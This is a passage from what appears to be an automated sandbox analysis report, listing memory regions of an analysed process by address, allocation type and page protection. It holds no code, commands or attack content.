trusted library allocation
|
page read and write
|
||
|
81FD000
|
stack
|
page read and write
|
||
|
82A0000
|
heap
|
page read and write
|
||
|
234DF000
|
stack
|
page read and write
|
||
|
1CB1A120000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
71F0000
|
trusted library allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
1CB34329000
|
heap
|
page read and write
|
||
|
2355E000
|
stack
|
page read and write
|
||
|
8240000
|
trusted library allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
7260000
|
trusted library allocation
|
page read and write
|
||
|
1CB1C000000
|
heap
|
page execute and read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
239D4000
|
direct allocation
|
page read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
817C000
|
stack
|
page read and write
|
||
|
80EA000
|
heap
|
page read and write
|
||
|
71AD000
|
stack
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
1CB1A165000
|
heap
|
page read and write
|
||
|
DA5000
|
heap
|
page read and write
|
||
|
81C0000
|
direct allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
1CB2C011000
|
trusted library allocation
|
page read and write
|
||
|
65E000
|
stack
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
1CB1A1D0000
|
trusted library allocation
|
page read and write
|
||
|
575A000
|
trusted library allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
1CB1DE4E000
|
trusted library allocation
|
page read and write
|
||
|
7C70000
|
heap
|
page read and write
|
||
|
239C0000
|
direct allocation
|
page read and write
|
||
|
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
6E32000
|
heap
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
6FB0000
|
heap
|
page read and write
|
||
|
1CB34250000
|
heap
|
page execute and read and write
|
||
|
1CB1C4A0000
|
trusted library allocation
|
page read and write
|
||
|
4660000
|
direct allocation
|
page read and write
|
||
|
98D000
|
trusted library allocation
|
page execute and read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
83B000
|
heap
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
6BF8000
|
trusted library allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
1CB1C507000
|
trusted library allocation
|
page read and write
|
||
|
81BC000
|
stack
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
712E000
|
stack
|
page read and write
|
||
|
1CB1DE63000
|
trusted library allocation
|
page read and write
|
||
|
1CB1DDBF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
81A000
|
heap
|
page read and write
|
||
|
1CB1C488000
|
trusted library allocation
|
page read and write
|
||
|
71E0000
|
trusted library allocation
|
page read and write
|
||
|
810000
|
heap
|
page read and write
|
||
|
82C0000
|
direct allocation
|
page read and write
|
||
|
226C4250000
|
heap
|
page read and write
|
||
|
429E000
|
stack
|
page read and write
|
||
|
1CB1DE52000
|
trusted library allocation
|
page read and write
|
||
|
1CB1A0C9000
|
heap
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
B18D000
|
direct allocation
|
page execute and read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
56F1000
|
trusted library allocation
|
page read and write
|
||
|
7270000
|
trusted library allocation
|
page read and write
|
||
|
1CB342AF000
|
heap
|
page read and write
|
||
|
7E41000
|
heap
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
1CB3406D000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
634D000
|
remote allocation
|
page execute and read and write
|
||
|
8CA1000
|
trusted library allocation
|
page read and write
|
||
|
7230000
|
trusted library allocation
|
page read and write
|
||
|
2AA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
43EE000
|
stack
|
page read and write
|
||
|
DB0000
|
heap
|
page read and write
|
||
|
6E9000
|
heap
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
4F4D000
|
remote allocation
|
page execute and read and write
|
||
|
1CB1DDE4000
|
trusted library allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
1CB1BA20000
|
heap
|
page read and write
|
||
|
1CB1BDA0000
|
trusted library allocation
|
page read and write
|
||
|
46E0000
|
heap
|
page execute and read and write
|
||
|
69E000
|
stack
|
page read and write
|
||
|
8060000
|
direct allocation
|
page read and write
|
||
|
8270000
|
trusted library allocation
|
page execute and read and write
|
||
|
43AE000
|
stack
|
page read and write
|
||
|
6E1E000
|
stack
|
page read and write
|
||
|
7030000
|
trusted library allocation
|
page read and write
|
||
|
823C000
|
stack
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
7C80000
|
trusted library allocation
|
page execute and read and write
|
||
|
6FA5000
|
heap
|
page read and write
|
||
|
1CB1C50B000
|
trusted library allocation
|
page read and write
|
||
|
8200000
|
direct allocation
|
page read and write
|
||
|
6BE0000
|
heap
|
page execute and read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
226C4245000
|
heap
|
page read and write
|
||
|
1CB1B9D0000
|
trusted library allocation
|
page read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
70EE000
|
stack
|
page read and write
|
||
|
1CB1BD70000
|
trusted library allocation
|
page read and write
|
||
|
990000
|
trusted library allocation
|
page read and write
|
||
|
72DC000
|
stack
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
7D30000
|
heap
|
page read and write
|
||
|
1CB34260000
|
heap
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
27B0000
|
heap
|
page read and write
|
||
|
226C403B000
|
heap
|
page read and write
|
||
|
2C2F000
|
stack
|
page read and write
|
||
|
80D4000
|
heap
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
1CB2C031000
|
trusted library allocation
|
page read and write
|
||
|
44EF000
|
stack
|
page read and write
|
||
|
C30778F000
|
stack
|
page read and write
|
||
|
5719000
|
trusted library allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
8070000
|
heap
|
page read and write
|
||
|
2A40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
2FE0000
|
direct allocation
|
page read and write
|
||
|
7E12000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB1B9B0000
|
trusted library allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
1CB1C23D000
|
trusted library allocation
|
page read and write
|
||
|
446E000
|
stack
|
page read and write
|
||
|
C306A37000
|
stack
|
page read and write
|
||
|
8015000
|
trusted library allocation
|
page read and write
|
||
|
484C000
|
trusted library allocation
|
page read and write
|
||
|
1CB34325000
|
heap
|
page read and write
|
||
|
4640000
|
direct allocation
|
page read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
1CB1D8D2000
|
trusted library allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
|
1CB1A000000
|
heap
|
page read and write
|
||
|
1CB19FE0000
|
heap
|
page read and write
|
||
|
42FC000
|
stack
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
1CB34052000
|
heap
|
page read and write
|
||
|
6BF0000
|
trusted library allocation
|
page read and write
|
||
|
1CB1C4C9000
|
trusted library allocation
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
8220000
|
direct allocation
|
page read and write
|
||
|
1CB1C491000
|
trusted library allocation
|
page read and write
|
||
|
442E000
|
stack
|
page read and write
|
||
|
6F5A000
|
heap
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page read and write
|
||
|
35C000
|
stack
|
page read and write
|
||
|
6C30000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
23C10000
|
heap
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
|
9B5000
|
trusted library allocation
|
page execute and read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
23780000
|
heap
|
page read and write
|
||
|
1CB1A1E0000
|
heap
|
page read and write
|
||
|
80B7000
|
heap
|
page read and write
|
||
|
80E7000
|
heap
|
page read and write
|
||
|
6DD000
|
stack
|
page read and write
|
||
|
71B0000
|
trusted library allocation
|
page read and write
|
||
|
C30687F000
|
stack
|
page read and write
|
||
|
7DF4AF800000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
239C0000
|
direct allocation
|
page read and write
|
||
|
6F30000
|
heap
|
page read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
1CB1A1E5000
|
heap
|
page read and write
|
||
|
82F000
|
heap
|
page read and write
|
||
|
70A0000
|
trusted library allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
7E00000
|
heap
|
page read and write
|
||
|
1CB1C839000
|
trusted library allocation
|
page read and write
|
||
|
1CB34010000
|
heap
|
page read and write
|
||
|
1CB1A0A9000
|
heap
|
page read and write
|
||
|
454D000
|
remote allocation
|
page execute and read and write
|
||
|
1CB1C4B4000
|
trusted library allocation
|
page read and write
|
||
|
1CB1DDE0000
|
trusted library allocation
|
page read and write
|
||
|
1CB1BEA0000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
C306C3F000
|
stack
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
2351E000
|
stack
|
page read and write
|
||
|
1CB1A0AF000
|
heap
|
page read and write
|
||
|
80B000
|
heap
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
1CB1BFD0000
|
heap
|
page execute and read and write
|
||
|
970000
|
trusted library allocation
|
page read and write
|
||
|
C30780E000
|
stack
|
page read and write
|
||
|
7250000
|
trusted library allocation
|
page read and write
|
||
|
9CA0000
|
direct allocation
|
page execute and read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
8FCB000
|
trusted library allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
8FB5000
|
trusted library allocation
|
page read and write
|
||
|
8240000
|
heap
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
730000
|
heap
|
page read and write
|
||
|
1CB34339000
|
heap
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
80E4000
|
heap
|
page read and write
|
||
|
7C67000
|
stack
|
page read and write
|
||
|
23B50000
|
heap
|
page read and write
|
||
|
1CB340BA000
|
heap
|
page read and write
|
||
|
1CB2C2FC000
|
trusted library allocation
|
page read and write
|
||
|
790000
|
trusted library section
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
1CB1A0F9000
|
heap
|
page read and write
|
||
|
8260000
|
trusted library allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
4670000
|
direct allocation
|
page read and write
|
||
|
7D10000
|
heap
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
4620000
|
direct allocation
|
page read and write
|
||
|
A78D000
|
direct allocation
|
page execute and read and write
|
||
|
1CB1BEB4000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
1CB1A00D000
|
heap
|
page read and write
|
||
|
239B4000
|
direct allocation
|
page read and write
|
||
|
71D0000
|
trusted library allocation
|
page read and write
|
||
|
1CB1DDDC000
|
trusted library allocation
|
page read and write
|
||
|
1CB34332000
|
heap
|
page read and write
|
||
|
1CB1DDD1000
|
trusted library allocation
|
page read and write
|
||
|
239B0000
|
direct allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
239D0000
|
direct allocation
|
page read and write
|
||
|
7240000
|
trusted library allocation
|
page read and write
|
||
|
1CB1D471000
|
trusted library allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
1CB34131000
|
heap
|
page read and write
|
||
|
594D000
|
remote allocation
|
page execute and read and write
|
||
|
1CB1C88B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
1CB1C4A4000
|
trusted library allocation
|
page read and write
|
||
|
2396C000
|
stack
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
2FF0000
|
direct allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
2AEF000
|
unkown
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
82B0000
|
direct allocation
|
page read and write
|
||
|
1CB1C011000
|
trusted library allocation
|
page read and write
|
||
|
980000
|
trusted library allocation
|
page read and write
|
||
|
C306D3E000
|
stack
|
page read and write
|
||
|
1CB1B9C0000
|
heap
|
page readonly
|
||
|
23890000
|
remote allocation
|
page read and write
|
||
|
4340000
|
trusted library allocation
|
page read and write
|
||
|
44AE000
|
stack
|
page read and write
|
||
|
8280000
|
trusted library allocation
|
page read and write
|
||
|
239D0000
|
direct allocation
|
page read and write
|
||
|
71C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5886000
|
trusted library allocation
|
page read and write
|
||
|
8078000
|
heap
|
page read and write
|
||
|
226C4030000
|
heap
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
28B0000
|
heap
|
page read and write
|
||
|
4600000
|
direct allocation
|
page read and write
|
||
|
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
|
4690000
|
direct allocation
|
page read and write
|
||
|
7CA0000
|
trusted library allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
C306DBB000
|
stack
|
page read and write
|
||
|
45F0000
|
direct allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A90000
|
heap
|
page readonly
|
||
|
46A0000
|
direct allocation
|
page read and write
|
||
|
1CB3409F000
|
heap
|
page read and write
|
||
|
72F000
|
stack
|
page read and write
|
||
|
1CB1D954000
|
trusted library allocation
|
page read and write
|
||
|
6F72000
|
heap
|
page read and write
|
||
|
9B2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
D6FB6FF000
|
stack
|
page read and write
|
||
|
1CB1D2AD000
|
trusted library allocation
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
238CE000
|
stack
|
page read and write
|
||
|
1CB1DE10000
|
trusted library allocation
|
page read and write
|
||
|
7E36000
|
heap
|
page read and write
|
||
|
E60000
|
heap
|
page readonly
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
C30631E000
|
stack
|
page read and write
|
||
|
7200000
|
trusted library allocation
|
page read and write
|
||
|
1CB340A1000
|
heap
|
page read and write
|
||
|
1CB1C49B000
|
trusted library allocation
|
page read and write
|
||
|
81E0000
|
direct allocation
|
page read and write
|
||
|
780000
|
trusted library section
|
page read and write
|
||
|
81B0000
|
direct allocation
|
page read and write
|
||
|
1CB34110000
|
heap
|
page read and write
|
||
|
1CB19FC0000
|
heap
|
page read and write
|
||
|
1CB1C6CC000
|
trusted library allocation
|
page read and write
|
||
|
C3068FC000
|
stack
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
4460000
|
remote allocation
|
page execute and read and write
|
||
|
1CB2C30B000
|
trusted library allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
265D000
|
stack
|
page read and write
|
||
|
1CB1DDF6000
|
trusted library allocation
|
page read and write
|
||
|
399000
|
stack
|
page read and write
|
||
|
DA0000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB1C747000
|
trusted library allocation
|
page read and write
|
||
|
1CB34257000
|
heap
|
page execute and read and write
|
||
|
1CB342CD000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
6DDE000
|
stack
|
page read and write
|
||
|
275E000
|
stack
|
page read and write
|
||
|
BB8D000
|
direct allocation
|
page execute and read and write
|
||
|
6D4D000
|
remote allocation
|
page execute and read and write
|
||
|
2ABB000
|
heap
|
page read and write
|
||
|
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
|
235DE000
|
stack
|
page read and write
|
||
|
236ED000
|
stack
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
984000
|
trusted library allocation
|
page read and write
|
||
|
716E000
|
stack
|
page read and write
|
There are 496 hidden memdumps, click here to show them.